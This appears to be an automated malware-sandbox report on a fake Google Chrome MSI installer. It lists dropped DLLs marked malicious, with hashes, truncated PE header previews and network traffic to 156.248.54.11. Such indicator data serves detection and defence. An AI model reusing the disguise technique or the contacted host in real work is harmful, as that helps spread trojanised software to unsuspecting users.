                                      SHA-512:32DFCBAA68F8CD387DD7A05D056368382911D7EC80B22475D182912CD27FF3888A0865916B9D76D76777A24F16FACF54EE342D1A7F4AB3B87624DDA1E72A367A
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.851599264948585
                                      Encrypted:false
                                      SSDEEP:384:kUgaco45Z49fN1XnWuIYi6y/g/HAM+o/8E9VF0NyhQM:MacV5yFXXnWjYi6ymAMxkEv
                                      MD5:456E12D968E0E77270173EF937915C3C
                                      SHA1:0DAF03D2C505467FDEC7B5BDFBE3699554892164
                                      SHA-256:C5C9AC04B400B67C6CFDF2EE9C21901DF239A00CABD402E59AF0A00D4EFB0173
                                      SHA-512:AA3A63145EE88D266E8B57202D01E934AA79B14C6CFF6DC1381B1C526A3F890EF6EA2917DA7AF1ACDD04785341B025FEA3709E636C9D36745E644CC2ABF5A1E7
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.846117586396544
                                      Encrypted:false
                                      SSDEEP:384:5FNrnrrGsMKt8hetnOfIYi6y7HoEAM+o/8E9VF0NyDR:lnrrGszt8hetnOgYi6ybAMxkE
                                      MD5:21E645B6564A4BFF088ABCDB94F7B4BA
                                      SHA1:DB9966EA497A9C5532172F8CB70D037FE2DAA13C
                                      SHA-256:08E643F88D1DF3F681824923EEA75F7DDDEE55D6AB62DCEB5A812C05CE8C753D
                                      SHA-512:81D7B60B211230C9AF1CF4B016E80092E3E765CB40E775992C850495CE8E4F9886F190A507650F26F092A468533FEC03B01AC3837D94282E75380602B9DB5E78
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.654307955240313
                                      Encrypted:false
                                      SSDEEP:768:8mp9FRqnk6qXQEdmvgNPTEw+G9Ahrxe+BzQSXGPYi6yF7AMxkEAU:8mtA6hdmvATEwSxrQKW7lxf
                                      MD5:E05348222EBC21D3D1B4AED180A62566
                                      SHA1:851394AE7D9C9FB85979B7D0F660A415004DEF0A
                                      SHA-256:531415CBE8C0753227934E926446872416E1593BD653826AA29BEA9E6F5AC668
                                      SHA-512:055A1AE42F5CD9229884EFBEA235085326B1B8904C4C28C5096430BC528A19AC29D450740A76D5C2BFD69D67A7E78958343FBAAB575B80AC495B3E373EF26502
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.81325112433323
                                      Encrypted:false
                                      SSDEEP:384:MVrwKgHxyC2secvVJE/GfuyQIYi6ynB9B6eAM+o/8E9VF0Nye/R8:QrwVuy5Yi6yXEeAMxkEei
                                      MD5:AF3F42CBB576430DDD211C4A1FA1D5A9
                                      SHA1:69149B4A0EE61C2250BD1A758FA7AA7C281A6178
                                      SHA-256:4D72AAD9545AB5EB6A89E3690675ABF9007CAA376D9DA6B0C8CB5C704BA9407D
                                      SHA-512:903007FF6E99201D38CF4B9ECC54DF9F1DE67DC58CBCC6277CEDE1BE2FE8EBB508D6A37DD4FD98D64E9A2616625544AE1302DAF335C2454C4A56C7CB4D18DD1A
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.800433810371665
                                      Encrypted:false
                                      SSDEEP:384:TVEq9zmAco2u9keeZyYGm9IYi6yud4LlAM+o/8E9VF0NyhGa:ZEq9zmAco2AkeesYNqYi6yqclAMxkEWa
                                      MD5:3C9DA7F71844BEB6DD85F8D77172B908
                                      SHA1:D54CA9CD4187DD7C165F549E34ED577F6B4B8315
                                      SHA-256:5C95D80D684E8A886DFBBCFB54F2EF4AD6C26FF0E17C6CCFEC2D8373BBC32A18
                                      SHA-512:CCD2B2EB17A25C95E8596600CDC629EE26780D014788DB8A526DF058832AFF7EBB2BB3273E5C0C9642D5949E78AE5A9F89640AA3C8807FA106338B459C9EBCD1
                                      Malicious:true
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.715476850485692
                                      Encrypted:false
                                      SSDEEP:384:xw9MXlJncBzIYi6ydFsLAM+o/8E9VF0NyHfAvOv:29MX3cB8Yi6yfuAMxkECi
                                      MD5:154B7A3DC9AE005E0D502E2D02B3473D
                                      SHA1:03EE0B94992A6EDCE78ABACE71C9F4EFEAFB7C97
                                      SHA-256:A9D43AE666670ECD93A16E131F402EC40067E44657A0BBC5136B152AD4706804
                                      SHA-512:823246ACB4205A60610B5FC09F54F758A70BC1596E118E323A1FA5092621094145CD5EA75A22CDDB944BDD7CD3A93D87B88EA887B1455EBF028EB6B9D0C1FC13
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ............................................@.............................I....0..(....@..0s.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0s...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):38176
                                      Entropy (8bit):4.778670861598811
                                      Encrypted:false
                                      SSDEEP:384:C1s5s9AoB2HIYi6y6KOpAM+o/8E9VF0NyB:i7AoB2oYi6yQAMxkE
                                      MD5:3238536195C72141BF60EE15CE6413DD
                                      SHA1:5D89916A8F72B9836E3E2E1EB93077B515A231E9
                                      SHA-256:5C0E33D4CBDA0D878A48C51A7286E6CE3884EF0AA06CE4FC306B888D3E8F07F4
                                      SHA-512:78FCC97DB95B720E1CE7FA24EC9820D784A8013F791837629021176F8AE416775ED8A25B3AFBCE33FC18B29DE5375F3EA2818A5A345BA0AD87BC71DFB72CBE0C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........f......h........ ............................................@.............................L....0..(....@...\...........l.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....\...@...^..................@..@.reloc.. ............j..............@..B................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):38176
                                      Entropy (8bit):4.793797453530872
                                      Encrypted:false
                                      SSDEEP:384:Z8dw29Gx/PhIYi6y8mAM+o/8E9VF0Nyy2ay:adwx/P2Yi6y5AMxkEJj
                                      MD5:64674D06CA9F8888A62B75DF12950CC2
                                      SHA1:4518365CE4270295271F6DFDE6ED452E0F67B855
                                      SHA-256:2B6AE6A1B6F89EE717ACB32EF44D229D7CF4CA24DC383D4A078F004B3434662B
                                      SHA-512:0824ECF6DA9F1A822AB646E47454442B13365F2A45792DCE5E68269D9D31CA32315CFCA11447FFAE1F17293231896DB36BFD35FDE6A644E674AD247F0AED9887
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........f......h........ ......................................B.....@.............................L....0..(....@..0]...........l.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0]...@...^..................@..@.reloc.. ............j..............@..B................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):278816
                                      Entropy (8bit):6.535975870555865
                                      Encrypted:false
                                      SSDEEP:6144:jRyuVhSBeXTIxjqJ64G6peRXpmAOcou9jtwQrHQc/mw3Ia:j8qhSBeX2jqJ6FvXpmmou9pwtovIa
                                      MD5:CDE140B706BB57F83D1AFE5C5B8EC346
                                      SHA1:44A286784BB6C8D8D66FF25FF8A502D06DB9BADA
                                      SHA-256:5A0C4B1BF6A52B2380803B3E2494DD37A221B68E5302B5AB7FF9C27D85398649
                                      SHA-512:414B7C24FEB8690B34EF80D53C03474BA7979EE7CD4D2F78AB9B26CD3B9669F20326E35AFD57C9954DC0BD2A8E25309FD1D00B7E0E3925C0E9F2351A1E0E414A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xV........................g...r.......r.......r...........................h..........................................Rich............................PE..L...)..e...........!.....*...................P...............................p......J%....@..........................r.......r...........h.............. )...@...-...b..T............................b..@............P..h............................text....'.......(.................. ..`.orpc...c....@.......,.............. ..`.rdata...6...P...6..................@..@.data...85...........d..............@....rsrc....h.......j..................@..@.reloc...-...@......................@..B........................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):355616
                                      Entropy (8bit):6.162519927894666
                                      Encrypted:false
                                      SSDEEP:6144:UuUZ+wSATioVOG31+aOEyxTM+d9+ohtbAcqARwytQc/mw:UbBSATioVR31+2ynD+oYcfwHo
                                      MD5:B002F5315B6EB8801A91756643A15C1B
                                      SHA1:BD14CB9D3808873888921DC893CA1CF48546676C
                                      SHA-256:0A9C8F037925570FFE1D36E19E194B7D67346306C93296745AE4FE7002F02D3E
                                      SHA-512:63F6F83F5BE656BD6F17CDF31AB4D8158E55E50BB3D72B4DF2FE08B132F166CE446B5C25A8A1860CE72DF1568AF71EE32B898A861FF99EDF09A5666A813C962A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?_.g{>.4{>.4{>.4.L.5.>.4.L.5w>.4.T.5[>.4.T.5r>.4.T.5G>.4.L.5l>.4.L.5f>.4{>.4.?.4.U.5H>.4.U.5z>.4.U 4z>.4{>H4z>.4.U.5z>.4Rich{>.4........................PE..d...+..e.........." .................9..............................................&.....`......................................... ^.......^.......P...h.......$...D.. )......$....8..T............................9...............................................text............................... ..`.orpc...$........................... ..`.rdata..V...........................@..@.data...|P.......*...X..............@....pdata...$.......&..................@..@_RDATA..............................@..@.gxfg...0.... ......................@..@.gehcont.....@......................@..@.rsrc....h...P...j..................@..@.reloc..$............,..............@..B........................................................
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):278816
                                      Entropy (8bit):6.535584786524981
                                      Encrypted:false
                                      SSDEEP:6144:sRyuVhSBeXTIxjqJ64G6peRXpmAOPfu0RtwQrHQc/mw3Ia:s8qhSBeX2jqJ6FvXpmVfu0bwtovIa
                                      MD5:D7770594FA82330B50573FDD8A2CCF3D
                                      SHA1:5A64FA8671AB64A2E974637917B987D001B4EDAF
                                      SHA-256:350339ACF9B3CA3055823C67AB568390D54C35DA4692E33C3A7E62FBC7C4B9A9
                                      SHA-512:CC2D672F15C5674B2DE8024E204D533EF9347DD635633074BF8C38A96209355B5A10D14706677060B01D5E329FC465259E8996587A0A2EA7F2FF7C7B5DBDD64A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xV........................g...r.......r.......r...........................h..........................................Rich............................PE..L...;..e...........!.....*...................P...............................p......4.....@..........................r.......r...........h.............. )...@...-...b..T............................b..@............P..h............................text....'.......(.................. ..`.orpc...c....@.......,.............. ..`.rdata...6...P...6..................@..@.data...85...........d..............@....rsrc....h.......j..................@..@.reloc...-...@......................@..B........................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):355616
                                      Entropy (8bit):6.161744248585241
                                      Encrypted:false
                                      SSDEEP:6144:5uU5uwSATioVOG31+aOEyxTM+d9eoh0bLc+ORwynlQc/mwu:5bRSATioVR31+2ynDeoScRwi+om
                                      MD5:458F24A910A1022B5DB6219E7A838CE5
                                      SHA1:DCA5EEF5567B54F8FD4BA11E40D766E4C1BB30B3
                                      SHA-256:E0D786B4823F4D4137A2110A2E867237ABC5BC29604A55D6A172199E56CE3BE7
                                      SHA-512:4D373720EB6BB4B901E250CF4DB778BE10F4FF4A260D62112DBF5E28F139C1C1C26B5B7268B7B3167E83E74BDF3BF6CC44C518127AFE1B26EFD5E874D2865B99
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?_.g{>.4{>.4{>.4.L.5.>.4.L.5w>.4.T.5[>.4.T.5r>.4.T.5G>.4.L.5l>.4.L.5f>.4{>.4.?.4.U.5H>.4.U.5z>.4.U 4z>.4{>H4z>.4.U.5z>.4Rich{>.4........................PE..d...K..e.........." .................9....................................................`..........................................^.......^.......P...h.......$...D.. )......$....8..T............................9...............................................text............................... ..`.orpc...$........................... ..`.rdata..F...........................@..@.data...|P.......*...X..............@....pdata...$.......&..................@..@_RDATA..............................@..@.gxfg...0.... ......................@..@.gehcont.....@......................@..@.rsrc....h...P...j..................@..@.reloc..$............,..............@..B........................................................
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:POSIX tar archive (GNU)
                                      Category:dropped
                                      Size (bytes):7290880
                                      Entropy (8bit):6.34667990473666
                                      Encrypted:false
                                      SSDEEP:98304:nKkEfg+g+GebMgllbcv3gjmGFbAoN8sJ6NpujeP8sJ6NpFje/iJ+mRUcf:BOg6MlRQZtjNjIgSc
                                      MD5:54140E1D25D47A927A96C71C946B7FED
                                      SHA1:77B5214D74D2E509B0A972B7B6EF92FC419491AC
                                      SHA-256:8D43014F9D44049E1742CBEB70DDDAEE63CA5D09DD73E47997421B41E9CE4B9F
                                      SHA-512:C0D79CBA16465A3DDE50BF3D28910040F8F3A70EFAA2F074E1F4CC9D5A735BE167F9116DE2B5FDD9B15C8315503F61FC6C1B1E9A66484ACB72827D164BB37BE0
                                      Malicious:false
                                      Preview:GoogleUpdate.exe....................................................................................0000777.0000000.0000000.00000474440.14547375663.012336. 0....................................................................................................ustar .................................................................0000000.0000000........................................................................................................................................................................MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L......e.................D..........Ru.......`....@.......................................@.................................P...x....... ............P.. )..........p[..T............................[..@...............L...........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.2136890115344305
                                      Encrypted:false
                                      SSDEEP:48:Tar7uTM+CFXJdT5O2GhS9SnAErCyMF4SjT9a:Wr7h1TZGU9BwCs
                                      MD5:94928EA99A2C04D4CF7BE7440D1F25EE
                                      SHA1:A60A8819AB7E0161B3EA90EB263C399BC4E9B5B3
                                      SHA-256:C521E9D82F6E42732C088C6CBCE249CF24B973B19693BCFC3F9CCD7B939DF4F3
                                      SHA-512:1891802F09E54F2A4FA36BB5C07163DDDA53AB5E338985F875A576635835980B28915058A0A24E064ACD5114648B735016ABCF4589614038DF43EC91186ABBD3
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.2136890115344305
                                      Encrypted:false
                                      SSDEEP:48:Tar7uTM+CFXJdT5O2GhS9SnAErCyMF4SjT9a:Wr7h1TZGU9BwCs
                                      MD5:94928EA99A2C04D4CF7BE7440D1F25EE
                                      SHA1:A60A8819AB7E0161B3EA90EB263C399BC4E9B5B3
                                      SHA-256:C521E9D82F6E42732C088C6CBCE249CF24B973B19693BCFC3F9CCD7B939DF4F3
                                      SHA-512:1891802F09E54F2A4FA36BB5C07163DDDA53AB5E338985F875A576635835980B28915058A0A24E064ACD5114648B735016ABCF4589614038DF43EC91186ABBD3
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.509525634457451
                                      Encrypted:false
                                      SSDEEP:48:88Phj7uRc06WXJ+nT542GhS9SnAErCyMF4SjT9a:Thj71VnT3GU9BwCs
                                      MD5:BFB5342BA5B855CFF339E3AB828E0718
                                      SHA1:E98E9776F7B0F6A2E80FBB0FB2D1314BF5372E87
                                      SHA-256:DB55298F40AF92CC83178EC085D6FAA7821CBC7F5E3309E9F57D6743CE52DE7E
                                      SHA-512:1A1D75C16D65B38787721140DEFFAF8FBB4F718D6C4B11F687A1EDCF986C93D2FD619BE95248CB7F7891CB0B393E6B7385C9DDD8F2F05F5E713EB13D437B8ACF
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):1.509525634457451
                                      Encrypted:false
                                      SSDEEP:48:88Phj7uRc06WXJ+nT542GhS9SnAErCyMF4SjT9a:Thj71VnT3GU9BwCs
                                      MD5:BFB5342BA5B855CFF339E3AB828E0718
                                      SHA1:E98E9776F7B0F6A2E80FBB0FB2D1314BF5372E87
                                      SHA-256:DB55298F40AF92CC83178EC085D6FAA7821CBC7F5E3309E9F57D6743CE52DE7E
                                      SHA-512:1A1D75C16D65B38787721140DEFFAF8FBB4F718D6C4B11F687A1EDCF986C93D2FD619BE95248CB7F7891CB0B393E6B7385C9DDD8F2F05F5E713EB13D437B8ACF
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.2136890115344305
                                      Encrypted:false
                                      SSDEEP:48:Tar7uTM+CFXJdT5O2GhS9SnAErCyMF4SjT9a:Wr7h1TZGU9BwCs
                                      MD5:94928EA99A2C04D4CF7BE7440D1F25EE
                                      SHA1:A60A8819AB7E0161B3EA90EB263C399BC4E9B5B3
                                      SHA-256:C521E9D82F6E42732C088C6CBCE249CF24B973B19693BCFC3F9CCD7B939DF4F3
                                      SHA-512:1891802F09E54F2A4FA36BB5C07163DDDA53AB5E338985F875A576635835980B28915058A0A24E064ACD5114648B735016ABCF4589614038DF43EC91186ABBD3
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.07657758529856493
                                      Encrypted:false
                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOlQ/8dD4puQVky6lWt/:2F0i8n0itFzDHFY9pwWt/
                                      MD5:75B261206A8A92406FED7E3EFC1BAA99
                                      SHA1:0B92FB2FD4C5DA232FB229FBAD7F566D76B03A55
                                      SHA-256:D40DEF5936C67C28785F52F0445F08C252F24ED64D5757DB6C0D5A922E52706F
                                      SHA-512:EFC73E0470591C4D17D1A64A920593E0E740EC325046C0C291391AC800FB5E193F05C414AD782E61DE531ECF84C394602649D25FD28EB09C5F9572289E88DE82
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):73728
                                      Entropy (8bit):0.11643479460724487
                                      Encrypted:false
                                      SSDEEP:24:IBm0hTx0wipV0a0wipV0SAEV0yjCyV+0KVQwGqpKNp+qN:OmQT9S7SnAErCyMFSNpdN
                                      MD5:6814D83FBED392CC2730F17BBE7EE8F6
                                      SHA1:526A8BCA656FD3F0CC9FC4B6B8C558A9C9085177
                                      SHA-256:1D4C5F702537151E0E6CE990933419239C551E575C1E226EB423F01646B7B1B4
                                      SHA-512:63E646146D3FBB6162352B2494104BA72AB67C29A2E0B5618652A6F063D99996044F9CA7CEB620FE2B57FDACB0909DCCBAAC0BA89C7709662A3068A965B70FD1
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 936, Revision Number: {924DFDB4-5E1D-409E-8393-FA9658AA79C4}, Number of Words: 2, Subject: Google Chrome, Author: Google, Name of Creating Application: Google Chrome, Template: ;2052, Comments: Installer Google Chrome , Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Apr 23 15:38:46 2024, Last Saved Time/Date: Tue Apr 23 15:38:46 2024, Last Printed: Tue Apr 23 15:38:46 2024, Number of Pages: 450
                                      Entropy (8bit):7.984095740506337
                                      TrID:
                                      • Windows SDK Setup Transform Script (63028/2) 47.91%
                                      • Microsoft Windows Installer (60509/1) 46.00%
                                      • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                      File name:sutup-Chrome.13.26.x64.msi
                                      File size:16'345'600 bytes
                                      MD5:86561e111e7ce97e13a9936b9b4ba849
                                      SHA1:61cd40da9253a367e416c9ab67e73738f18948c3
                                      SHA256:bd462515ea9ffe66fc27d9baa0fcc4bf733385829c2fc5676129aaeeb2e0af88
                                      SHA512:33d26416412d777fb2758bc41b44a9e9107906879c85bb4609702242deb2bcd83ed8a5f5da7a1d3e4662ca7b31dbfbbe1faa8364952546ff600136e8c2cf7d54
                                      SSDEEP:393216:qCBN2m9uaDsIqvv3/L/2m68UzYWIMWLBM36dmdRwhm7YLp:RkmqvHv1M/q8dOh
                                      TLSH:C1F63321354EC935D66F16341939AB2E463C3E228FE514D7F394BE6B09312C3B638A5B
                                      Icon Hash:2d2e3797b32b2b99
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Apr 26, 2024 12:53:44.697782993 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697789907 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697813034 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697832108 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697853088 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697879076 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697896957 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697902918 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697923899 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697937965 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697941065 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697978973 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.698103905 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698122025 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698148012 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698165894 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698179960 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.698209047 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.698805094 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698858023 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698875904 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698899984 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.739739895 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:45.741082907 CEST49719443192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:45.741118908 CEST44349719156.248.54.11192.168.2.5
